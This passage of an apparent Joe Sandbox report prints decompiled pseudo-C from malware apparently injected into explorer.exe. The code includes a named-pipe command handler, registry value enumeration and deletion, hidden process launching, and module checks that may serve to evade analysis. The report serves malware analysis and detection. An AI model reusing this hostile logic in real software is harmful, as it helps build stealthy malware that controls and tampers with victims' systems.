							_t143 =  *((intOrPtr*)(_t142 + 0x10))(0, 0,  &_v620);
							__eflags = _t143;
							if(_t143 == 0) {
								E000CE2C6(_t353,  &_v588);
								_t235 =  *0xde6b4; // 0x14cfa98
								_pop(_t262);
								 *((intOrPtr*)(_t235 + 0xc))(_v632);
							}
							__eflags =  *0xde73c;
							if( *0xde73c <= 0) {
								goto L36;
							} else {
								_t165 =  *0xde680; // 0x14cfda0
								__eflags =  *(_t165 + 8);
								if( *(_t165 + 8) != 0) {
									_t231 =  *(_t165 + 0xc);
									__eflags = _t231;
									if(_t231 != 0) {
										 *_t231(_v580);
									}
								}
								_t166 =  *0xde688; // 0xf0000
								_t262 =  *((intOrPtr*)(_t166 + 0x214));
								__eflags = _t262 - _t246;
								if(_t262 == _t246) {
									goto L36;
								} else {
									__eflags =  *((intOrPtr*)(_t166 + 4)) - 6;
									if( *((intOrPtr*)(_t166 + 4)) >= 6) {
										__eflags =  *((intOrPtr*)(_t166 + 0x101c)) - _t246;
										if( *((intOrPtr*)(_t166 + 0x101c)) == _t246) {
											E000C49A5();
											asm("stosd");
											asm("stosd");
											asm("stosd");
											asm("stosd");
											_t170 =  *0xde684; // 0x14cf8f0
											 *((intOrPtr*)(_t170 + 0xd8))( &_v608);
											_t262 = _v602;
											_t248 = 0x3c;
											_t173 = _t262 + 0x00000002 & 0x0000ffff;
											_v596 = _t173;
											_v620 = _t173 / _t248 + _v604 & 0x0000ffff;
											_t178 = _t262 + 0x0000000e & 0x0000ffff;
											_v624 = _t178;
											_v628 = _t178 / _t248 + _v604 & 0x0000ffff;
											_t182 =  *0xde688; // 0xf0000
											_t184 = E000CFC1F(_t182 + 0x228, _t178 % _t248, _t353, 0, _t182 + 0x228, 0);
											_t339 = _t339 + 0xc;
											__eflags = _t184;
											if(_t184 >= 0) {
												_t333 = E000C8604(0x1000);
												_v616 = _t333;
												_pop(_t262);
												__eflags = _t333;
												if(_t333 != 0) {
													_t186 = E000C109A(_t262, 0x148);
													_t305 =  *0xde688; // 0xf0000
													_v636 = _t186;
													_push(_t305 + 0x648);
													_push(0xa);
													_push(7);
													_t271 = 2;
													E000C902D(_t271,  &_v572);
													_t272 =  *0xde688; // 0xf0000
													_t188 = E000C60DF( &_v572, _t272 + 0x228, 1,  *((intOrPtr*)(_t272 + 0xa0)));
													_t339 = _t339 + 0x18;
													_v632 = _t188;
													__eflags = _t188;
													if(_t188 != 0) {
														_push(_v624 % _t248 & 0x0000ffff);
														_push(_v628 & 0x0000ffff);
														_push(_v596 % _t248 & 0x0000ffff);
														_push(_v620 & 0x0000ffff);
														_push(_v632);
														_push( &_v572);
														_t200 =  *0xde688; // 0xf0000
														__eflags = _t200 + 0x1020;
														E000C9640(_t333, 0x1000, _v636, _t200 + 0x1020);
														E000C85D5( &_v636);
														E000CA911(_t333, 0, 0xbb8, 1);
														E000C861A( &_v632, 0xfffffffe);
														_t339 = _t339 + 0x44;
													}
													E000C861A( &_v616, 0xfffffffe);
													_pop(_t262);
												}
											}
										}
										goto L36;
									}
									__eflags = _t262 - 2;
									if(_t262 != 2) {
										goto L36;
									}
									E000C49A5();
									asm("stosd");
									asm("stosd");
									asm("stosd");
									asm("stosd");
									_t211 =  *0xde684; // 0x14cf8f0
									 *((intOrPtr*)(_t211 + 0xd8))( &_v608);
									_t215 = _v602 + 0x00000002 & 0x0000ffff;
									_v628 = _t215;
									_t277 = 0x3c;
									_v632 = _t215 / _t277 + _v604 & 0x0000ffff;
									_t249 = E000C8604(0x1000);
									_v624 = _t249;
									_pop(_t278);
									__eflags = _t249;
									if(_t249 != 0) {
										_t220 = E000C95E1(_t278, 0x32d);
										_t280 =  *0xde688; // 0xf0000
										_push(_t280 + 0x228);
										_t282 = 0x3c;
										_v636 = _t220;
										_push(_v628 % _t282 & 0x0000ffff);
										E000C9640(_t249, 0x1000, _t220, _v632 & 0x0000ffff);
										E000C85D5( &_v636);
										E000CA911(_t249, 0, 0xbb8, 1);
										E000C861A( &_v624, 0xfffffffe);
									}
									goto L41;
								}
							}
						} else {
							_t238 =  *((intOrPtr*)(_t262 + 0x214));
							__eflags = _t238 - _t246;
							if(_t238 == _t246) {
								goto L17;
							}
							__eflags =  *((intOrPtr*)(_t262 + 4)) - 6;
							if( *((intOrPtr*)(_t262 + 4)) >= 6) {
								L36:
								_t144 = E000C95E1(_t262, 0x610);
								_push(0);
								_push(_t144);
								_v616 = _t144;
								_t145 =  *0xde688; // 0xf0000
								_t329 = E000C92E5(_t145 + 0x228);
								_v612 = _t329;
								__eflags = _t329;
								if(_t329 != 0) {
									_t160 = E000CB269(_t329);
									__eflags = _t160;
									if(_t160 != 0) {
										_t163 =  *0xde684; // 0x14cf8f0
										 *((intOrPtr*)(_t163 + 0x10c))(_t329);
									}
									E000C861A( &_v612, 0xfffffffe);
								}
								E000C85D5( &_v616);
								_t150 =  *0xde688; // 0xf0000
								lstrcpynW(_t150 + 0x438,  *0xde740, 0x105);
								_t153 =  *0xde688; // 0xf0000
								_t154 = _t153 + 0x228;
								__eflags = _t154;
								lstrcpynW(_t154,  *0xde738, 0x105);
								_t331 =  *0xde688; // 0xf0000
								_t117 = _t331 + 0x228; // 0xf0228
								 *((intOrPtr*)(_t331 + 0x434)) = E000C8FBE(_t117, __eflags);
								E000C861A(0xde740, 0xfffffffe);
								E000C861A(0xde738, 0xfffffffe);
								L41:
								_t159 = 0;
								__eflags = 0;
								L42:
								return _t159;
							}
							__eflags = _t238 - 2;
							if(_t238 != 2) {
								goto L36;
							}
							goto L17;
						}
					}
					L8:
					_t159 = _t122 | 0xffffffff;
					goto L42;
				}
				_t250 = E000C95C7(0x6e2);
				_v616 = _t250;
				_t326 = E000C95C7(0x9f5);
				_v612 = _t326;
				if(_t250 != 0 && _t326 != 0) {
					if(GetModuleHandleA(_t250) != 0 || GetModuleHandleA(_t326) != 0) {
						_v620 = 1;
					}
					E000C85C2( &_v616);
					_t122 = E000C85C2( &_v612);
					_t351 = _v620;
					if(_v620 != 0) {
						goto L8;
					}
				}
			}

0x000c4d6d
0x000c4d73
0x000c4d79
0x000c4d7e
0x000c4d8c
0x000c4d8f
0x000c4dee
0x000c4df7
0x000c4e00
0x000c4e03
0x000c4e0a
0x000c4e0f
0x000c4e14
0x000c4e1b
0x000c4e25
0x000c4e2c
0x000c4e32
0x000c4e37
0x000c4e3c
0x000c4e43
0x000c4e49
0x000c4e4b
0x000c4e4c
0x000c4e50
0x000c4e5b
0x000c4e60
0x000c4e69
0x000c4e6e
0x000c4e76
0x000c4e7d
0x000c4e7e
0x000c4e80
0x000c4e9c
0x000c4e9f
0x000c4e9f
0x000c4ea8
0x000c4ead
0x000c4ebd
0x000c4ec5
0x000c4eca
0x000c4ed0
0x000c4ed3
0x000c4ed9
0x000c4ef8
0x000c4efe
0x000c4eff
0x000c4f00
0x000c4f01
0x000c4f02
0x000c4f03
0x000c4f0d
0x000c4f11
0x000c4f16
0x000c4f19
0x000c4f1b
0x000c4f2d
0x000c4f2d
0x000c4f2f
0x000c4f3b
0x000c4f40
0x000c4f46
0x000c4f4f
0x000c4f52
0x000c4f54
0x000c4f5f
0x000c4f64
0x000c4f69
0x000c4f6e
0x000c4f6e
0x000c4f71
0x000c4f78
0x00000000
0x000c4f7e
0x000c4f7e
0x000c4f83
0x000c4f87
0x000c4f89
0x000c4f8c
0x000c4f8e
0x000c4f94
0x000c4f94
0x000c4f8e
0x000c4f96
0x000c4f9b
0x000c4fa1
0x000c4fa3
0x00000000
0x000c4fa9
0x000c4fa9
0x000c4fad
0x000c5082
0x000c5088
0x000c508e
0x000c5099
0x000c509a
0x000c509b
0x000c509c
0x000c50a2
0x000c50a7
0x000c50ad
0x000c50b5
0x000c50bb
0x000c50be
0x000c50cd
0x000c50d4
0x000c50d7
0x000c50e4
0x000c50e8
0x000c50f5
0x000c50fa
0x000c50fd
0x000c50ff
0x000c5110
0x000c5112
0x000c5116
0x000c5117
0x000c5119
0x000c5124
0x000c5129
0x000c5136
0x000c513a
0x000c513b
0x000c513d
0x000c5145
0x000c5146
0x000c514b
0x000c5163
0x000c5168
0x000c516b
0x000c516f
0x000c5171
0x000c5184
0x000c518e
0x000c5192
0x000c519a
0x000c519b
0x000c51a3
0x000c51a4
0x000c51a9
0x000c51b5
0x000c51bf
0x000c51d1
0x000c51dd
0x000c51e2
0x000c51e2
0x000c51ec
0x000c51f2
0x000c51f2
0x000c5119
0x000c50ff
0x00000000
0x000c5088
0x000c4fb3
0x000c4fb6
0x00000000
0x00000000
0x000c4fbc
0x000c4fc7
0x000c4fc8
0x000c4fc9
0x000c4fca
0x000c4fd0
0x000c4fd5
0x000c4fe9
0x000c4fee
0x000c4ff2
0x000c4ffd
0x000c5006
0x000c5008
0x000c500c
0x000c500d
0x000c500f
0x000c501a
0x000c5020
0x000c5032
0x000c5035
0x000c5038
0x000c5045
0x000c504d
0x000c5057
0x000c5069
0x000c5075
0x000c507a
0x00000000
0x000c500f
0x000c4fa3
0x000c4edb
0x000c4edb
0x000c4ee1
0x000c4ee3
0x00000000
0x00000000
0x000c4ee5
0x000c4ee9
0x000c51f3
0x000c51f8
0x000c51fe
0x000c5200
0x000c5201
0x000c5205
0x000c5215
0x000c521a
0x000c521e
0x000c5220
0x000c5224
0x000c5229
0x000c522b
0x000c522d
0x000c5233
0x000c5233
0x000c5240
0x000c5246
0x000c524c
0x000c5251
0x000c526f
0x000c5271
0x000c527d
0x000c527d
0x000c5283
0x000c5285
0x000c528b
0x000c529d
0x000c52a3
0x000c52af
0x000c52b7
0x000c52b7
0x000c52b7
0x000c52b9
0x000c52bf
0x000c52bf
0x000c4eef
0x000c4ef2
0x00000000
0x00000000
0x00000000
0x000c4ef2
0x000c4ed9
0x000c4e1d
0x000c4e1d
0x00000000
0x000c4e1d
0x000c4d9b
0x000c4da2
0x000c4dab
0x000c4dad
0x000c4db3
0x000c4dc4
0x000c4dcd
0x000c4dcd
0x000c4dd9
0x000c4de2
0x000c4de7
0x000c4dec
0x00000000
0x00000000
0x000c4dec

APIs

GetModuleHandleA.KERNEL32(00000000,00000000), ref: 000C4DC0
GetModuleHandleA.KERNEL32(00000000), ref: 000C4DC7
lstrcpynW.KERNEL32(000EFBC8,00000105), ref: 000C526F
lstrcpynW.KERNEL32(000EFDD8,00000105), ref: 000C5283

Memory Dump Source

Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c0000_explorer.jbxd

Yara matches

Similarity

API ID: HandleModulelstrcpyn
String ID:
API String ID: 3430401031-0
Opcode ID: daa6f0749694e7ac1462caa31c5450f290e1f394fe52ddb5101126fd241d7950
Instruction ID: c173cb8aab5dce0c54eecf333e52df57e25390bf92b520147ff03b0ab50bf869
Opcode Fuzzy Hash: daa6f0749694e7ac1462caa31c5450f290e1f394fe52ddb5101126fd241d7950
Instruction Fuzzy Hash: 36E1CF71604341AFE750EF64CC86FAE73E9AB98314F040A2EF944DB2D2DB74D9448B62

Uniqueness

Uniqueness Score: -1.00%

Function 000C32A1, Relevance: 6.2, APIs: 4, Instructions: 189
pipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 54%

			E000C32A1() {
				char _v8;
				struct _OVERLAPPED* _v12;
				struct _OVERLAPPED* _v16;
				intOrPtr* _v20;
				char _v24;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr* _v40;
				char _v168;
				char _v172;
				intOrPtr _t41;
				void* _t47;
				char _t54;
				char _t61;
				intOrPtr _t64;
				void* _t65;
				void* _t68;
				void* _t70;
				void* _t72;
				void* _t76;
				struct _OVERLAPPED* _t82;
				intOrPtr* _t83;
				signed int _t84;
				signed short* _t86;
				intOrPtr* _t97;
				signed short* _t105;
				void* _t107;
				void* _t108;
				void* _t109;
				intOrPtr* _t112;
				struct _OVERLAPPED* _t113;
				char _t114;
				void* _t115;

				_t113 = 0;
				_t82 = 0;
				_v8 = 0;
				_v12 = 0;
				while(1) {
					_v16 = _t113;
					if(ConnectNamedPipe( *0xde674, _t113) == 0 && GetLastError() != 0x217) {
						break;
					}
					_push(_t113);
					_push( &_v16);
					_t41 =  *0xde684; // 0x14cf8f0
					_push(0x80000);
					_push( *0xde724);
					_push( *0xde674);
					if( *((intOrPtr*)(_t41 + 0x88))() == 0 || _v16 == 0) {
						GetLastError();
					} else {
						_t86 =  *0xde724; // 0x13a0020
						_t47 = ( *_t86 & 0x0000ffff) - 1;
						if(_t47 == 0) {
							_t112 = E000C93BE( &(_t86[4]), 0x20, 1,  &_v24);
							_v40 = _t112;
							if(_t112 != 0) {
								_t114 = _v24;
								if(_t114 <= 1) {
									_t113 = 0;
									_t54 = E000C1DA0(E000C9749( *_t112), 0, 0, 0);
									_t115 = _t115 + 0x10;
									_v172 = _t54;
								} else {
									_v36 = _t114 - 1;
									_t83 = E000C8604(_t114 - 1 << 2);
									_v32 = _t83;
									if(_t83 == 0) {
										_t113 = 0;
									} else {
										if(_t114 > 1) {
											_v20 = _t83;
											_t84 = 1;
											do {
												_t64 = E000C91A6( *((intOrPtr*)(_t112 + _t84 * 4)), E000CC379( *((intOrPtr*)(_t112 + _t84 * 4))));
												_t97 = _v20;
												_t84 = _t84 + 1;
												 *_t97 = _t64;
												_v20 = _t97 + 4;
											} while (_t84 < _t114);
											_t83 = _v32;
										}
										_t113 = 0;
										_t61 = E000C1DA0(E000C9749( *_t112), _t83, _v36, 0);
										_t115 = _t115 + 0x10;
										_v172 = _t61;
										E000C94B7( &_v24);
									}
									_t82 = _v12;
								}
							}
							_t105 =  *0xde724; // 0x13a0020
							E000C96CA( &_v168,  &(_t105[4]), 0x80);
							_push(0x84);
							_push( &_v172);
							_push(2);
							goto L33;
						} else {
							_t65 = _t47 - 3;
							if(_t65 == 0) {
								_push(_t113);
								_push(_t113);
								_t108 = 5;
								E000CC319(_t108);
								 *0xde758 = 1;
								_t82 = 1;
								_v12 = 1;
							} else {
								_t68 = _t65;
								if(_t68 == 0) {
									_t70 = E000CF79F( &_v8);
									goto L13;
								} else {
									_t72 = _t68 - 1;
									if(_t72 == 0) {
										E000CF79F( &_v8);
										goto L16;
									} else {
										_t76 = _t72 - 1;
										if(_t76 == 0) {
											_t70 = E000CF7C1( &_v8);
											L13:
											if(_t70 == 0) {
												_push(_t113);
												_push(_t113);
												_push(0xa);
											} else {
												_push(_v8);
												_push(_t70);
												_push(5);
											}
											_pop(_t109);
											E000CC319(_t109);
										} else {
											if(_t76 == 1) {
												E000CF7C1( &_v8);
												L16:
												_push(4);
												_push( &_v8);
												_push(5);
												L33:
												_pop(_t107);
												E000CC319(_t107);
												_t115 = _t115 + 0xc;
											}
										}
									}
								}
							}
						}
					}
					DisconnectNamedPipe( *0xde674);
					if(_t82 == 0) {
						continue;
					}
					break;
				}
				return 0;
			}

0x000c32ac
0x000c32ae
0x000c32b0
0x000c32b4
0x000c32b7
0x000c32c3
0x000c32ce
0x00000000
0x00000000
0x000c32e1
0x000c32e5
0x000c32e6
0x000c32eb
0x000c32f0
0x000c32f6
0x000c3304
0x000c34a8
0x000c3314
0x000c3314
0x000c331d
0x000c3320
0x000c33c8
0x000c33ca
0x000c33d1
0x000c33d7
0x000c33dd
0x000c3456
0x000c3461
0x000c3466
0x000c3469
0x000c33df
0x000c33e2
0x000c33ee
0x000c33f0
0x000c33f6
0x000c3471
0x000c33f8
0x000c33fd
0x000c33ff
0x000c3402
0x000c3404
0x000c3412
0x000c3417
0x000c341a
0x000c341b
0x000c3420
0x000c3423
0x000c3427
0x000c3427
0x000c342c
0x000c3439
0x000c343e
0x000c3441
0x000c344d
0x000c344d
0x000c3473
0x000c3473
0x000c33dd
0x000c3476
0x000c348a
0x000c348f
0x000c349a
0x000c349b
0x00000000
0x000c3326
0x000c3326
0x000c3329
0x000c3397
0x000c3398
0x000c339b
0x000c339c
0x000c33a3
0x000c33ae
0x000c33b0
0x000c332b
0x000c332c
0x000c332f
0x000c337f
0x00000000
0x000c3331
0x000c3331
0x000c3334
0x000c3369
0x00000000
0x000c3336
0x000c3336
0x000c3339
0x000c3353
0x000c3358
0x000c335b
0x000c3386
0x000c3387
0x000c3388
0x000c335d
0x000c335d
0x000c3360
0x000c3361
0x000c3361
0x000c338a
0x000c338b
0x000c333b
0x000c333e
0x000c3348
0x000c336e
0x000c336e
0x000c3373
0x000c3374
0x000c349d
0x000c349d
0x000c349e
0x000c34a3
0x000c34a3
0x000c333e
0x000c3339
0x000c3334
0x000c332f
0x000c3329
0x000c3320
0x000c34b4
0x000c34bc
0x00000000
0x00000000
0x00000000
0x000c34bc
0x000c34c8

APIs

ConnectNamedPipe.KERNELBASE(00000000), ref: 000C32C6
GetLastError.KERNEL32 ref: 000C32D0

Part of subcall function 000CC319: FlushFileBuffers.KERNEL32(000001FC), ref: 000CC35F

DisconnectNamedPipe.KERNEL32 ref: 000C34B4

Memory Dump Source

Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c0000_explorer.jbxd

Yara matches

Similarity

API ID: NamedPipe$BuffersConnectDisconnectErrorFileFlushLast
String ID:
API String ID: 2389948835-0
Opcode ID: bf80b9096a2aca5aa3972cea32dde4ba6c78e98aa77ff021d4b3e440f009a802
Instruction ID: 58aa84d8eb2c3f5bebb521c1968008652298eb85fb782967e61da74a0d83595a
Opcode Fuzzy Hash: bf80b9096a2aca5aa3972cea32dde4ba6c78e98aa77ff021d4b3e440f009a802
Instruction Fuzzy Hash: EA512471A10205AFDB61EFA4DC89FEEBBB8EF05300F10812EF504A6152DB349B44CB60

Uniqueness

Uniqueness Score: -1.00%

Function 000C61B4, Relevance: 6.1, APIs: 4, Instructions: 145
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E000C61B4(void* __edx, void* __fp0, void* _a4, short* _a8, intOrPtr _a12, intOrPtr _a16) {
				void* _v8;
				int _v12;
				int _v16;
				int _v20;
				char _v24;
				char _v28;
				void* _v32;
				void* _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v56;
				void _v576;
				intOrPtr _t63;
				intOrPtr _t72;
				intOrPtr _t80;
				intOrPtr _t81;
				intOrPtr _t82;
				signed int _t85;
				intOrPtr _t87;
				int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				void* _t96;
				void* _t97;
				void* _t98;
				void* _t99;
				void* _t100;
				void* _t108;

				_t108 = __fp0;
				_t96 = __edx;
				_t89 = 0;
				_v8 = 0;
				memset( &_v576, 0, 0x208);
				_v28 = 0x104;
				_v20 = 0x3fff;
				_v16 = 0;
				_t98 = E000C8604(0x3fff);
				_t100 = _t99 + 0x10;
				_v32 = _t98;
				if(_t98 == 0) {
					L18:
					return 0;
				}
				_t97 = E000C8604(0x800);
				_v36 = _t97;
				if(_t97 == 0) {
					goto L18;
				}
				if(RegOpenKeyExW(_a4, _a8, 0, 0x2001f,  &_v8) != 0) {
					L15:
					if(_v8 != 0) {
						_t63 =  *0xde68c; // 0x14cfab8
						 *((intOrPtr*)(_t63 + 0x1c))(_v8);
					}
					E000C861A( &_v32, 0x3fff); // executed
					E000C861A( &_v36, 0x800); // executed
					goto L18;
				}
				_push( &_v56);
				_push( &_v40);
				_push( &_v44);
				_push( &_v48);
				_push( &_v24);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push( &_v28);
				_push( &_v576);
				_t72 =  *0xde68c; // 0x14cfab8
				_push(_v8);
				if( *((intOrPtr*)(_t72 + 0xb0))() == 0) {
					__eflags = _v24;
					if(_v24 == 0) {
						goto L15;
					}
					_v12 = 0;
					do {
						memset(_t97, 0, 0x800);
						memset(_t98, 0, 0x3fff);
						_t100 = _t100 + 0x18;
						_v20 = 0x3fff;
						_v16 = 0x800;
						 *_t98 = 0;
						_t80 =  *0xde68c; // 0x14cfab8
						_t81 =  *((intOrPtr*)(_t80 + 0xc8))(_v8, _t89, _t98,  &_v20, 0, 0, _t97,  &_v16);
						__eflags = _t81;
						if(_t81 == 0) {
							_t82 =  *0xde690; // 0x14cfb90
							_t90 =  *((intOrPtr*)(_t82 + 4))(_t97, _a12);
							__eflags = _t90;
							if(_t90 != 0) {
								_t92 =  *0xde68c; // 0x14cfab8
								 *((intOrPtr*)(_t92 + 0xa8))(_v8, _t98);
								__eflags = _a16;
								if(_a16 != 0) {
									_t85 = E000CC392(_t90);
									__eflags =  *((short*)(_t90 + _t85 * 2 - 2)) - 0x22;
									if(__eflags == 0) {
										__eflags = 0;
										 *((short*)(_t90 + _t85 * 2 - 2)) = 0;
									}
									E000CB1B1(_t90, _t96, __eflags, _t108);
								}
							}
							_t89 = _v12;
						}
						_t89 = _t89 + 1;
						_v12 = _t89;
						__eflags = _t89 - _v24;
					} while (_t89 < _v24);
					goto L15;
				}
				_t87 =  *0xde68c; // 0x14cfab8
				 *((intOrPtr*)(_t87 + 0x1c))(_v8);
				goto L15;
			}

0x000c61b4
0x000c61b4
0x000c61c0
0x000c61cf
0x000c61d2
0x000c61dc
0x000c61e4
0x000c61e7
0x000c61ef
0x000c61f1
0x000c61f4
0x000c61f9
0x000c6365
0x000c6369
0x000c6369
0x000c6209
0x000c620b
0x000c6211
0x00000000
0x00000000
0x000c6234
0x000c6333
0x000c6337
0x000c6339
0x000c6341
0x000c6341
0x000c634d
0x000c635b
0x00000000
0x000c6360
0x000c623d
0x000c6241
0x000c6245
0x000c6249
0x000c624d
0x000c624e
0x000c624f
0x000c6250
0x000c6251
0x000c6255
0x000c625c
0x000c625d
0x000c6262
0x000c626d
0x000c6282
0x000c6284
0x00000000
0x00000000
0x000c628a
0x000c628d
0x000c6295
0x000c62a2
0x000c62a7
0x000c62aa
0x000c62b3
0x000c62ba
0x000c62ca
0x000c62d4
0x000c62da
0x000c62dc
0x000c62e1
0x000c62ea
0x000c62ec
0x000c62ee
0x000c62f0
0x000c62fa
0x000c6300
0x000c6304
0x000c6308
0x000c630d
0x000c6313
0x000c6315
0x000c6317
0x000c6317
0x000c631e
0x000c631e
0x000c6304
0x000c6323
0x000c6323
0x000c6326
0x000c6327
0x000c632a
0x000c632a
0x00000000
0x000c628d
0x000c626f
0x000c6277
0x00000000

APIs

memset.MSVCRT ref: 000C61D2

Part of subcall function 000C8604: RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612

RegOpenKeyExW.KERNEL32(?,?,00000000,0002001F,?,?,?,00000001), ref: 000C622C
memset.MSVCRT ref: 000C6295
memset.MSVCRT ref: 000C62A2

Memory Dump Source

Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c0000_explorer.jbxd

Yara matches

Similarity

API ID: memset$AllocateHeapOpen
String ID:
API String ID: 2508404634-0
Opcode ID: a89f2d27602f936c16bf0b6f0ecb78ef43fe3f844ef85e803e973f395852986b
Instruction ID: f078e681015c4581afc2321a8b200155c778797c9d6990bad354d136111ed3bb
Opcode Fuzzy Hash: a89f2d27602f936c16bf0b6f0ecb78ef43fe3f844ef85e803e973f395852986b
Instruction Fuzzy Hash: 33510EB1A00249AFEB61DF94CC85FEE7BBCEF04740F10806AF605AB152DB759A058B65

Uniqueness

Uniqueness Score: -1.00%

Function 000CA911, Relevance: 6.1, APIs: 4, Instructions: 74
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 65%

			E000CA911(WCHAR* _a4, DWORD* _a8, intOrPtr _a12, signed int _a16) {
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOW _v92;
				signed int _t24;
				intOrPtr _t32;
				intOrPtr _t34;
				int _t42;
				WCHAR* _t44;

				_t42 = 0x44;
				memset( &_v92, 0, _t42);
				_v92.cb = _t42;
				asm("stosd");
				_t44 = 1;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t24 = _a16;
				if(_t24 != 0) {
					_v92.dwFlags = 1;
					_v92.wShowWindow = 0;
				}
				asm("sbb eax, eax");
				if(CreateProcessW(0, _a4, 0, 0, 0,  ~_t24 & 0x08000000, 0, 0,  &_v92,  &_v20) == 0) {
					_t44 = 0;
				} else {
					if(_a8 != 0) {
						_push(_a12);
						_t34 =  *0xde684; // 0x14cf8f0
						_push(_v20.hProcess);
						if( *((intOrPtr*)(_t34 + 0x2c))() >= 0) {
							GetExitCodeProcess(_v20.hProcess, _a8);
						}
					}
					CloseHandle(_v20.hThread);
					_t32 =  *0xde684; // 0x14cf8f0
					 *((intOrPtr*)(_t32 + 0x30))(_v20);
				}
				return _t44;
			}

0x000ca91c
0x000ca925
0x000ca92c
0x000ca934
0x000ca938
0x000ca939
0x000ca93a
0x000ca93b
0x000ca93c
0x000ca941
0x000ca945
0x000ca948
0x000ca948
0x000ca955
0x000ca971
0x000ca9ae
0x000ca973
0x000ca976
0x000ca978
0x000ca97b
0x000ca980
0x000ca988
0x000ca990
0x000ca990
0x000ca988
0x000ca99e
0x000ca9a1
0x000ca9a9
0x000ca9a9
0x000ca9b6

APIs

memset.MSVCRT ref: 000CA925
CreateProcessW.KERNEL32(00000000,00001388,00000000,00000000,00000000,000CC1AB,00000000,00000000,?,00000000,00000000,00000000,00000001), ref: 000CA96C
GetExitCodeProcess.KERNELBASE(00000000,?), ref: 000CA990
CloseHandle.KERNELBASE(?), ref: 000CA99E

Memory Dump Source

Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c0000_explorer.jbxd

Yara matches

Similarity

API ID: Process$CloseCodeCreateExitHandlememset
String ID:
API String ID: 2668540068-0
Opcode ID: 515fd2f31e6901e20d6c51561e52fb1df9f2721549949078c0095c01d271d124
Instruction ID: ad8e7d9e7c99006ac07fdead5766fa5e04d5cfaaf349d8d5b7d3a67e274f57a9
Opcode Fuzzy Hash: 515fd2f31e6901e20d6c51561e52fb1df9f2721549949078c0095c01d271d124
Instruction Fuzzy Hash: 4F210E71A10119BFEB519FA9DC85EAE7BBCEB18784B01441AFA15D6161D634DC008B61

Uniqueness

Uniqueness Score: -1.00%

Function 000CB012, Relevance: 6.1, APIs: 4, Instructions: 72
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 87%

			E000CB012(void* __ecx, WCHAR* __edx) {
				int _v8;
				void _v528;
				char _v1046;
				void _v1048;
				intOrPtr _t21;
				intOrPtr* _t26;
				void* _t27;
				intOrPtr _t33;
				intOrPtr _t36;
				void* _t39;
				intOrPtr _t40;
				WCHAR* _t47;
				void* _t49;

				_t39 = __ecx;
				_v8 = 0x104;
				_t47 = __edx;
				memset( &_v1048, 0, 0x208);
				memset( &_v528, 0, 0x208);
				_t21 =  *0xde698; // 0x14cfbc8
				 *((intOrPtr*)(_t21 + 4))(0, 0x1a, 0, 1,  &_v1048);
				_t49 = E000CB946(_t39);
				_t26 =  *0xde6b8; // 0x14cfbd8
				_t27 =  *_t26(_t49,  &_v528,  &_v8); // executed
				if(_t27 == 0) {
					_t33 =  *0xde688; // 0xf0000
					if(E000CBB8D( *((intOrPtr*)( *((intOrPtr*)(_t33 + 0x110))))) != 0) {
						_t36 =  *0xde698; // 0x14cfbc8
						 *((intOrPtr*)(_t36 + 4))(0, 0x24, 0, 1,  &_v528);
					}
				}
				_t40 =  *0xde684; // 0x14cf8f0
				 *((intOrPtr*)(_t40 + 0x30))(_t49);
				lstrcpynW(_t47,  &_v1046 + E000CC392( &_v528) * 2, 0x104);
				return 1;
			}

0x000cb012
0x000cb023
0x000cb035
0x000cb037
0x000cb045
0x000cb054
0x000cb05f
0x000cb067
0x000cb074
0x000cb07a
0x000cb07e
0x000cb080
0x000cb094
0x000cb09d
0x000cb0a8
0x000cb0a8
0x000cb094
0x000cb0ab
0x000cb0b2
0x000cb0d0
0x000cb0dd

APIs

memset.MSVCRT ref: 000CB037
memset.MSVCRT ref: 000CB045
SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000001,?,?,?,?,?,?,00000000), ref: 000CB05F

Part of subcall function 000CB946: GetCurrentThread.KERNEL32(00000008,00000000,10000000,00000000,?,?,000CBA7C,74EC17D9,10000000), ref: 000CB959
Part of subcall function 000CB946: GetLastError.KERNEL32(?,?,000CBA7C,74EC17D9,10000000), ref: 000CB967
Part of subcall function 000CB946: GetCurrentProcess.KERNEL32(00000008,10000000,?,?,000CBA7C,74EC17D9,10000000), ref: 000CB980

lstrcpynW.KERNEL32(?,?,00000104,?,?,?,?,?,00000000), ref: 000CB0D0

Memory Dump Source

Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c0000_explorer.jbxd

Yara matches

Similarity

API ID: Currentmemset$ErrorFolderLastPathProcessThreadlstrcpyn
String ID:
API String ID: 3158470084-0
Opcode ID: cf666d5b425dfdb882d85405df432cbf1151db4e83984f2af2481bad33d39ac9
Instruction ID: 51dd89181f6f65cfcdbed33b84d5b23baa4a46682fef0b4f5f6547b1bf5b27aa
Opcode Fuzzy Hash: cf666d5b425dfdb882d85405df432cbf1151db4e83984f2af2481bad33d39ac9
Instruction Fuzzy Hash: 8C2196B1501218AFE710EB94DCC5EDB37BCEB58354F1040A5F605D7192D7749E458B70

Uniqueness

Uniqueness Score: -1.00%

Function 000CBF37, Relevance: 6.1, APIs: 4, Instructions: 72
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

